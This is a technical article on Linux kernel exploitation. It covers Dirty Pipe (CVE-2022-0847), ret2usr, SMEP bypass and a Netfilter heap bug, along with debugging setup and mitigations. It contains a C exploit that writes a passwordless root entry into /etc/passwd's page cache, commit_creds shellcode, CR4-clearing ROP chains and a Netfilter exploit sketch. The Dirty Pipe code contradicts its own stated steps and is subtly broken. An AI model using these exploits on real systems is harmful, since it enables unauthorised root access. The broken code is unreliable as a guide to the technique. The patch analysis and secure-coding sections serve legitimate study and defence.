Linux Kernel Exploitation: CVE Analysis and ret2usr Attack Techniques

Mamoun Tarsha-Kurdi

Introduction

Linux kernel exploitation requires understanding kernel internals, protection mechanisms (SMEP, SMAP, KASLR), and vulnerability patterns. This article examines real CVEs and exploitation techniques used in modern kernel exploits.

Dirty Pipe (CVE-2022-0847)

Vulnerability Background

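Dirty Pipe lets an unprivileged user overwrite data in the page cache of any file they can open for reading, including files they have no write permission for. Overwriting an entry in /etc/passwd, or patching a setuid binary, leads to privilege escalation. /etc/shadow is not a direct target because the attacker must be able to read the file. The overwrite cannot start on a page boundary, cannot cross a page boundary, and cannot extend the file.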

Affected versions: Linux 5.8 and later, until the fix in 5.16.11, 5.15.25, and 5.10.102
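
The version window can be turned into a quick triage check. The sketch below is a minimal illustration, assuming upstream version numbering and the fix releases 5.16.11, 5.15.25, and 5.10.102; the helper names `dirty_pipe_affected` and `release_affected` are hypothetical. Distribution kernels often backport fixes without changing the upstream version number, so the result is only a hint, not proof.

```c
#include <stdbool.h>
#include <stdio.h>

/* Hypothetical helper: true if upstream release major.minor.patch falls in
 * the Dirty Pipe window (5.8 up to the fixes in 5.10.102, 5.15.25, 5.16.11). */
bool dirty_pipe_affected(int major, int minor, int patch)
{
    if (major != 5)
        return false;               /* older majors predate the bug, newer ones ship the fix */
    if (minor < 8 || minor > 16)
        return false;               /* before 5.8, or 5.17 and later */
    if (minor == 10)
        return patch < 102;
    if (minor == 15)
        return patch < 25;
    if (minor == 16)
        return patch < 11;
    return true;                    /* other series in the window: no fixed release assumed */
}

/* Parse a release string such as "5.13.0-19-generic" (the format of uname -r). */
bool release_affected(const char *release)
{
    int major = 0, minor = 0, patch = 0;

    if (sscanf(release, "%d.%d.%d", &major, &minor, &patch) < 2)
        return false;               /* unparseable: make no claim */
    return dirty_pipe_affected(major, minor, patch);
}
```

Feeding `release_affected()` the `release` field filled in by `uname(2)` gives a first indication of whether a host needs a closer look.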

Root Cause Analysis

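// Simplified from lib/iov_iter.c (vulnerable versions): splice() from a file
// ends up here to attach a page cache page to a pipe buffer
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset,
                                     size_t bytes, struct iov_iter *i)
{
    // ... locate the next free slot "buf" in the pipe ring

    buf->ops = &page_cache_pipe_buf_ops;
    get_page(page);
    buf->page = page;       // the file's page cache page, not a copy
    buf->offset = offset;
    buf->len = bytes;
    // VULNERABILITY: buf->flags is never initialized, so the slot keeps
    // whatever flags its previous user left behind

    // ...
}

// Simplified from fs/pipe.c: the merge path that consumes the stale flag
static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
    // ... setup code

    // Try to append to the most recently filled buffer
    struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
    int offset = buf->offset + buf->len;

    // With a stale PIPE_BUF_FLAG_CAN_MERGE, this copies user data
    // straight into the page cache page referenced by buf->page
    if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
        offset + chars <= PAGE_SIZE) {
        ret = copy_page_from_iter(buf->page, offset, chars, from);
    }

    // ...
}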

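The bug: when splice() moves file data into a pipe, the pipe buffer references the file’s page cache page directly, and the code that sets up the buffer does not initialize its flags field. If that slot previously held data from an ordinary write(), a stale PIPE_BUF_FLAG_CAN_MERGE survives, and the next write() to the pipe is merged into the page cache page, even when the file is read-only.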
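
The stale-flag pattern can be reproduced in a few lines of ordinary userspace C. The following is a toy model only, not kernel code: `struct toy_buf`, `TOY_CAN_MERGE`, and all function names are made up for illustration. It shows how a slot that is reused without resetting its flags inherits a "may merge" bit that was only valid for its previous contents, and how resetting the flags on reuse removes the problem.

```c
#include <stdbool.h>
#include <string.h>

#define TOY_CAN_MERGE 0x10u   /* stand-in for PIPE_BUF_FLAG_CAN_MERGE */

/* Toy stand-in for struct pipe_buffer; "shared" marks a page the buffer
 * only references (like a page cache page) rather than owns. */
struct toy_buf {
    char page[16];
    unsigned int len;
    unsigned int flags;
    bool shared;
};

/* Ordinary write into a fresh slot: the pipe owns the page, merging is fine. */
void toy_write_new(struct toy_buf *b, const char *data, unsigned int n)
{
    memcpy(b->page, data, n);
    b->len = n;
    b->flags = TOY_CAN_MERGE;
    b->shared = false;
}

/* Reader consumed everything: the slot is free, but flags are left as-is. */
void toy_drain(struct toy_buf *b)
{
    b->len = 0;
}

/* Attach a shared page to the slot. init_flags=false models the bug,
 * init_flags=true models a fix that resets flags on reuse. */
void toy_attach_shared(struct toy_buf *b, const char *page, unsigned int n,
                       bool init_flags)
{
    memcpy(b->page, page, n);
    b->len = n;
    b->shared = true;
    if (init_flags)
        b->flags = 0;
}

/* Would a later write be merged into a page the pipe does not own? */
bool toy_merge_hits_shared(const struct toy_buf *b)
{
    return b->shared && (b->flags & TOY_CAN_MERGE) != 0;
}
```

Running write, drain, attach with `init_flags` set to false leaves `toy_merge_hits_shared()` true; the same sequence with `init_flags` set to true leaves it false.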

Exploitation

// CVE-2022-0847 exploit
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#include <unistd.h>

#define DATA "root::0:0:root:/root:/bin/bash\n"

int main() {
    int pipe_fds[2];
    int target_fd, arbitrary_fd;

    // 1. Create pipe
    if (pipe(pipe_fds) < 0) {
        perror("pipe");
        return 1;
    }

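    // 2. Put data from an arbitrary file into the pipe
    // Note: splice() does not set PIPE_BUF_FLAG_CAN_MERGE itself; on a vulnerable
    // kernel the flag is a stale leftover from earlier write() calls on the slot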
    arbitrary_fd = open("/etc/hostname", O_RDONLY);
    if (arbitrary_fd < 0) {
        perror("open arbitrary");
        return 1;
    }

    // Splice data into pipe (the flags field of the buffer is left uninitialized)
    if (splice(arbitrary_fd, NULL, pipe_fds[1], NULL, 1, 0) < 0) {
        perror("splice");
        return 1;
    }
    close(arbitrary_fd);

    // 3. Drain pipe (but buffers with flag remain)
    char buffer[4096];
    read(pipe_fds[0], buffer, 1);

    // 4. Open target read-only file
    target_fd = open("/etc/passwd", O_RDONLY);
    if (target_fd < 0) {
        perror("open target");
        return 1;
    }

    // 5. Splice target file into pipe
    // This reuses buffers with PIPE_BUF_FLAG_CAN_MERGE set
    if (splice(target_fd, NULL, pipe_fds[1], NULL, 1, 0) < 0) {
        perror("splice target");
        return 1;
    }

    // 6. Write malicious data to pipe
    // Due to PIPE_BUF_FLAG_CAN_MERGE, this writes to /etc/passwd page cache!
    write(pipe_fds[1], DATA, strlen(DATA));

    printf("[+] /etc/passwd overwritten!\n");
    printf("[+] New root entry: %s\n", DATA);
    printf("[+] Run: su root (no password needed)\n");

    close(pipe_fds[0]);
    close(pipe_fds[1]);
    close(target_fd);

    return 0;
}

Exploitation steps:

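  1. Create a pipe
  2. Fill the pipe with ordinary write() calls → every buffer slot gets PIPE_BUF_FLAG_CAN_MERGE
  3. Drain the pipe (slots are freed, stale flags remain)
  4. Splice from the target read-only file → a slot now references the file’s page cache page and keeps the stale flag
  5. Write to pipe → data is merged into the read-only file’s page cache
  6. The change is visible to every reader of the file, but the page is not marked dirty, so it is normally not written back to disk and disappears once the page is evicted or the system reboots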

Patch Analysis

// Fix in lib/iov_iter.c (Linux 5.16.11, 5.15.25, 5.10.102)
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset,
                                     size_t bytes, struct iov_iter *i)
{
    // ...

    buf->ops = &page_cache_pipe_buf_ops;
    // FIX: initialize flags so a reused slot cannot inherit
    // PIPE_BUF_FLAG_CAN_MERGE from its previous contents
    buf->flags = 0;
    get_page(page);
    buf->page = page;
    buf->offset = offset;
    buf->len = bytes;

    // ...
}

// push_pipe() received the same one-line initialization for the
// buffers it allocates

ret2usr Attack Technique

Concept

ret2usr (return-to-user) redirects hijacked kernel control flow to code mapped in userspace memory, which then runs with kernel privileges (ring 0).

Prerequisites:

  • Kernel vulnerability (use-after-free, buffer overflow, etc.)
  • Ability to control kernel RIP
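  • SMEP disabled or bypassed
  • KPTI disabled or bypassed (with KPTI, user pages are mapped non-executable in the kernel’s page tables)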

Exploitation Steps

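// 1. Prepare shellcode in userspace
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>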

void* prepare_payload() {
    // Allocate executable memory at low address
    void* shellcode_addr = mmap((void*)0x10000000, 0x1000,
                                PROT_READ | PROT_WRITE | PROT_EXEC,
                                MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
                                -1, 0);

    if (shellcode_addr == MAP_FAILED) {
        perror("mmap");
        return NULL;
    }

    // Shellcode: commit_creds(prepare_kernel_cred(0))
    unsigned char shellcode[] = {
        0x48, 0x31, 0xff,                   // xor rdi, rdi
        0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, // movabs rax, prepare_kernel_cred
              0x00, 0x00, 0x00, 0x00,
        0xff, 0xd0,                         // call rax
        0x48, 0x89, 0xc7,                   // mov rdi, rax
        0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, // movabs rax, commit_creds
              0x00, 0x00, 0x00, 0x00,
        0xff, 0xd0,                         // call rax
        0x48, 0x31, 0xc0,                   // xor rax, rax
        0xc3                                // ret
    };

    memcpy(shellcode_addr, shellcode, sizeof(shellcode));
    return shellcode_addr;
}

// 2. Trigger vulnerability to hijack kernel control flow
void trigger_vuln(void* shellcode) {
    int fd = open("/dev/vulnerable_device", O_RDWR);

    // Assuming vulnerable ioctl that allows RIP control
    unsigned long payload[] = {
        0x4141414141414141,  // padding
        0x4242424242424242,  // rbp
        (unsigned long)shellcode  // return address → userspace
    };

    ioctl(fd, VULN_CMD, payload);

    // If successful, we now have root
    if (getuid() == 0) {
        printf("[+] Got root!\n");
        system("/bin/sh");
    }
}

SMEP Bypass

SMEP (Supervisor Mode Execution Prevention) is a CPU feature that raises a fault when code running in ring 0 tries to fetch instructions from a user-mode page, which blocks a plain ret2usr.
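
Whether the running system reports SMEP (and SMAP) can be checked from userspace without touching CR4. The sketch below assumes an x86 Linux system where /proc/cpuinfo contains a "flags" line listing features such as smep and smap; the function names `has_cpu_flag` and `cpu_supports` are hypothetical.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* True if `flag` appears as a whole whitespace-separated word in `line`. */
bool has_cpu_flag(const char *line, const char *flag)
{
    size_t n = strlen(flag);
    const char *p = line;

    if (n == 0)
        return false;
    while ((p = strstr(p, flag)) != NULL) {
        bool starts = (p == line) || p[-1] == ' ' || p[-1] == '\t';
        bool ends = p[n] == '\0' || p[n] == ' ' || p[n] == '\n';
        if (starts && ends)
            return true;
        p += n;
    }
    return false;
}

/* Scan /proc/cpuinfo for the first "flags" line and test it for `flag`.
 * Returns 1 if present, 0 if absent, -1 if the file could not be read. */
int cpu_supports(const char *flag)
{
    char line[8192];
    FILE *fp = fopen("/proc/cpuinfo", "r");
    int result = 0;

    if (!fp)
        return -1;
    while (fgets(line, sizeof(line), fp)) {
        if (strncmp(line, "flags", 5) == 0) {
            result = has_cpu_flag(line, flag) ? 1 : 0;
            break;
        }
    }
    fclose(fp);
    return result;
}
```

Calling `cpu_supports("smep")` and `cpu_supports("smap")` gives a quick view of what a test VM exposes before debugging an exploit against it.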

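Bypass technique: ROP to disable SMEP by writing a new CR4 value. Since Linux 5.3, native_write_cr4() pins the SMEP and SMAP bits and restores them, so this classic chain only applies to older kernels.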

// ROP chain to disable SMEP
unsigned long rop_chain[] = {
    // pop rdi; ret
    0xffffffff81000001,

    // New CR4 value with the SMEP bit (bit 20, mask 0x100000) cleared
    // Example original: 0x1407f0 (SMEP enabled)
    // Value written:    0x6f0    (SMEP and SMAP bits clear)
    0x6f0,

    // native_write_cr4 (write CR4 register)
    0xffffffff81002222,

    // Address of shellcode in userspace
    0x10000000
};
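
The CR4 constants in listings like the one above are easy to get wrong, so it helps to check them with plain bit arithmetic. SMEP is bit 20 of CR4 (mask 0x100000) and SMAP is bit 21 (mask 0x200000). The helpers below are an illustrative sketch with made-up names; they only inspect and mask integer values and do not touch the real register.

```c
#include <stdbool.h>
#include <stdint.h>

#define CR4_SMEP (UINT64_C(1) << 20)   /* 0x100000 */
#define CR4_SMAP (UINT64_C(1) << 21)   /* 0x200000 */

bool cr4_smep_enabled(uint64_t cr4) { return (cr4 & CR4_SMEP) != 0; }
bool cr4_smap_enabled(uint64_t cr4) { return (cr4 & CR4_SMAP) != 0; }

/* Return cr4 with only the SMEP and SMAP bits cleared, other bits kept. */
uint64_t cr4_without_smep_smap(uint64_t cr4)
{
    return cr4 & ~(CR4_SMEP | CR4_SMAP);
}
```

For example, 0x1407f0 has bit 20 set, while 0x407f0 and 0x6f0 do not; clearing both bits in 0x3407f0 yields 0x407f0.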

Use-After-Free Exploitation

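CVE-2021-22555 (Netfilter)

CVE-2021-22555 is a heap out-of-bounds write in the Netfilter compat setsockopt path, not a use-after-free in itself; the public exploit converts the out-of-bounds write into a use-after-free.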

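// Simplified from net/netfilter/x_tables.c (before the fix)
void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
                                unsigned int *size)
{
    const struct xt_target *target = t->u.kernel.target;
    struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
    int pad, off = xt_compat_target_offset(target);
    u_int16_t tsize = ct->u.user.target_size;

    // Destination is the already-allocated native-layout table blob
    t = *dstptr;
    memcpy(t, ct, sizeof(*ct));
    if (target->compat_from_user)
        target->compat_from_user(t->data, ct->data);
    else
        memcpy(t->data, ct->data, tsize - sizeof(*ct));

    // VULNERABILITY: zero padding is written after the converted target;
    // when the size accounting has not reserved room for it, the memset()
    // writes a few zero bytes past the end of the heap allocation
    pad = XT_ALIGN(target->targetsize) - target->targetsize;
    if (pad > 0)
        memset(t->data + target->targetsize, 0, pad);

    // ... update size and pointers
}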

Exploitation:

#include <linux/netfilter/x_tables.h>
#include <sys/socket.h>

void exploit_netfilter() {
    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

    // Craft malicious compat iptables rule
    struct ipt_replace *repl;
    repl = malloc(sizeof(*repl) + 0x1000);

    strcpy(repl->name, "filter");
    repl->num_entries = 1;
    repl->size = 0x1000;

    // Malicious target with undersized buffer
    struct xt_entry_target *target = (void*)(repl + 1);
    target->target_size = 0x10;  // Too small!

    // Trigger vulnerability
    setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, repl, sizeof(*repl) + 0x1000);

    // Spray heap with controlled objects
    for (int i = 0; i < 1000; i++) {
        // Allocate objects to occupy freed memory
        // ...
    }
}

Kernel Debugging Setup

QEMU + GDB

#!/bin/bash
# Build kernel with debugging symbols
cd linux-source
make defconfig
echo "CONFIG_DEBUG_INFO=y" >> .config
echo "CONFIG_DEBUG_INFO_DWARF4=y" >> .config
echo "CONFIG_GDB_SCRIPTS=y" >> .config
echo "CONFIG_FRAME_POINTER=y" >> .config
# Re-resolve dependencies so the appended options are applied consistently
make olddefconfig
make -j$(nproc)

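# Create minimal root filesystem (a statically linked shell such as busybox
# must be copied to rootfs/bin/sh for the init script below to work)
mkdir -p rootfs/{bin,sbin,etc,proc,sys,dev}
cd rootfs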
cat > init << 'EOF'
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs none /dev
exec /bin/sh
EOF
chmod +x init

# Create initramfs, then return to the kernel source tree
find . | cpio -o -H newc | gzip > ../rootfs.cpio.gz
cd ..

# Launch QEMU with debugging
qemu-system-x86_64 \
    -kernel arch/x86/boot/bzImage \
    -initrd rootfs.cpio.gz \
    -nographic \
    -append "console=ttyS0 nokaslr" \
    -s \
    -S  # Wait for GDB connection

# In another terminal: GDB
gdb vmlinux
(gdb) target remote :1234
(gdb) b prepare_kernel_cred
(gdb) c

Debugging Kernel Exploits

# GDB Python script for kernel exploit debugging
import gdb

class FindCredStruct(gdb.Command):
    """Find cred structure for current task"""

    def __init__(self):
        super(FindCredStruct, self).__init__("find-cred", gdb.COMMAND_USER)

    def invoke(self, arg, from_tty):
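        # Get current task_struct ($lx_current() comes from the kernel's
        # vmlinux-gdb.py helper scripts, enabled by CONFIG_GDB_SCRIPTS)
        current = gdb.parse_and_eval("$lx_current()")

        # Get cred pointer
        cred = current['cred']

        # Print the task's address rather than dumping the whole structure
        print(f"task_struct: {current.address}")
        print(f"cred: {cred}")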
        print(f"uid: {cred['uid']['val']}")
        print(f"gid: {cred['gid']['val']}")
        print(f"euid: {cred['euid']['val']}")

FindCredStruct()

# Usage in GDB:
# (gdb) find-cred

Protection Mechanisms

KASLR (Kernel Address Space Layout Randomization)

// Read the kernel text base from /proc/kallsyms
// (requires root: other readers typically see every address as 0)
void leak_kernel_base() {
    FILE* fp = fopen("/proc/kallsyms", "r");
    char buf[256], name[128], type;
    unsigned long addr;

    if (!fp) {
        perror("fopen /proc/kallsyms");
        return;
    }

    while (fgets(buf, sizeof(buf), fp)) {
        // Each line is "<address> <type> <name>"; match the name exactly
        if (sscanf(buf, "%lx %c %127s", &addr, &type, name) == 3 &&
            strcmp(name, "_text") == 0) {
            // _text marks the start of the kernel image, so it is the base
            printf("[+] Kernel base (_text): 0x%lx\n", addr);
            break;
        }
    }
    fclose(fp);
}

// Alternative: Leak via timing attack
unsigned long leak_kaslr_timing() {
    // Exploit CPU cache timing to determine kernel addresses
    // Uses speculative execution side channels
    // (Implementation complex, omitted for brevity)
    return 0;  // placeholder so the stub has a defined return value
}
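
Once the address of _text is known, for example from /proc/kallsyms in a debugging VM, the KASLR slide is a simple subtraction. The sketch below assumes an x86_64 kernel whose unrandomized text base is 0xffffffff81000000 and whose randomization granularity is 2 MiB (the default CONFIG_PHYSICAL_ALIGN); both constants and the function names are assumptions for illustration and differ on other architectures or configurations.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumption: default x86_64 address of _text when KASLR is off. */
#define DEFAULT_TEXT_BASE UINT64_C(0xffffffff81000000)
/* Assumption: 2 MiB randomization granularity (default CONFIG_PHYSICAL_ALIGN). */
#define KASLR_ALIGN       UINT64_C(0x200000)

/* Offset of the running kernel's _text from the default base. */
uint64_t kaslr_slide(uint64_t text_addr)
{
    return text_addr - DEFAULT_TEXT_BASE;
}

/* Sanity check: a plausible _text address is aligned and not below the default base. */
bool plausible_text_addr(uint64_t text_addr)
{
    return text_addr >= DEFAULT_TEXT_BASE &&
           (text_addr % KASLR_ALIGN) == 0;
}
```

A slide of zero means the kernel booted without randomization, as it does with the nokaslr option used in the QEMU setup.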

SMEP/SMAP

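// Check SMEP/SMAP status
// Must run in ring 0 (for example inside a kernel module): reading CR4 is a
// privileged instruction and faults when executed from userspace
void check_protections() {
    unsigned long cr4;

    // Read CR4 register
    asm volatile("mov %%cr4, %0" : "=r"(cr4));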

    printf("CR4: 0x%lx\n", cr4);
    printf("SMEP (bit 20): %s\n", (cr4 & (1<<20)) ? "Enabled" : "Disabled");
    printf("SMAP (bit 21): %s\n", (cr4 & (1<<21)) ? "Enabled" : "Disabled");
}

// Bypass via ROP: load a CR4 value with the SMEP bit cleared
unsigned long rop_bypass_smep[] = {
    // pop rcx; ret
    0xffffffff81001111,
    0x6f0,  // CR4 value (SMEP disabled)

    // mov cr4, rcx; ret
    0xffffffff81002222,

    // Continue exploitation...
};

Mitigation Techniques

Secure Coding Practices

// INSECURE: No bounds checking
void vulnerable_copy(char* dest, const char* src, size_t len) {
    memcpy(dest, src, len);  // len is user-controlled!
}

// SECURE: Bounds checking
void secure_copy(char* dest, size_t dest_size, const char* src, size_t len) {
    if (len > dest_size) {
        pr_err("Copy would overflow buffer\n");
        return;
    }

    memcpy(dest, src, len);
}

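// SECURE: Use kernel-provided safe functions for userspace pointers
int best_copy(char* dest, size_t dest_size, const char __user* src, size_t len) {
    // copy_from_user validates the source, not the destination size
    if (len > dest_size)
        return -EINVAL;

    // copy_from_user returns bytes NOT copied (0 on success)
    if (copy_from_user(dest, src, len)) {
        pr_err("Failed to copy from userspace\n");
        return -EFAULT;
    }
    return 0;
}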
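
Bounds checks themselves are a common source of bugs once an offset is involved, because a naive test such as offset + len <= dest_size can wrap around for large values. The userspace sketch below shows one overflow-safe way to phrase the check; `range_fits` and `copy_at` are hypothetical names, and this is an illustration of the pattern rather than kernel code.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* True if [offset, offset + len) fits inside a buffer of dest_size bytes.
 * Written so that no intermediate sum can wrap around. */
bool range_fits(size_t dest_size, size_t offset, size_t len)
{
    return offset <= dest_size && len <= dest_size - offset;
}

/* Copy len bytes to dest + offset; returns 0 on success, -1 if out of bounds. */
int copy_at(char *dest, size_t dest_size, size_t offset,
            const char *src, size_t len)
{
    if (!range_fits(dest_size, offset, len))
        return -1;
    memcpy(dest + offset, src, len);
    return 0;
}
```

With a 16-byte buffer, an offset of 8 and a length of (size_t)-1 would pass the naive sum check after wrapping, but `range_fits()` rejects it because the subtraction is done on values already known to be in range.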

Runtime Checks

// Enable runtime checks
#ifdef CONFIG_FORTIFY_SOURCE
// Compiler instruments memcpy/strcpy with size checks
#endif

#ifdef CONFIG_UBSAN
// Undefined Behavior Sanitizer catches integer overflows
#endif

#ifdef CONFIG_KASAN
// Kernel Address Sanitizer detects memory errors
#endif

Conclusion

Linux kernel exploitation requires deep understanding of:

  1. Kernel internals (memory management, syscalls, drivers)
  2. Vulnerability classes (UAF, buffer overflows, race conditions)
  3. Protection mechanisms (SMEP, SMAP, KASLR, PAN)
  4. Exploitation techniques (ret2usr, ROP, heap spray)
  5. Debugging tools (GDB, QEMU, crash dumps)

Modern kernels include multiple defense layers, making exploitation increasingly difficult but not impossible. Responsible disclosure and patch analysis remain critical for security research.

References

  1. CVE-2022-0847 - Dirty Pipe Vulnerability
  2. CVE-2021-22555 - Netfilter Heap Out-of-Bounds Write
  3. Corbet, J. (2022). “Kernel Address Sanitizer”
  4. Linux Kernel Documentation - Security
  5. Kerrisk, M. (2010). “The Linux Programming Interface”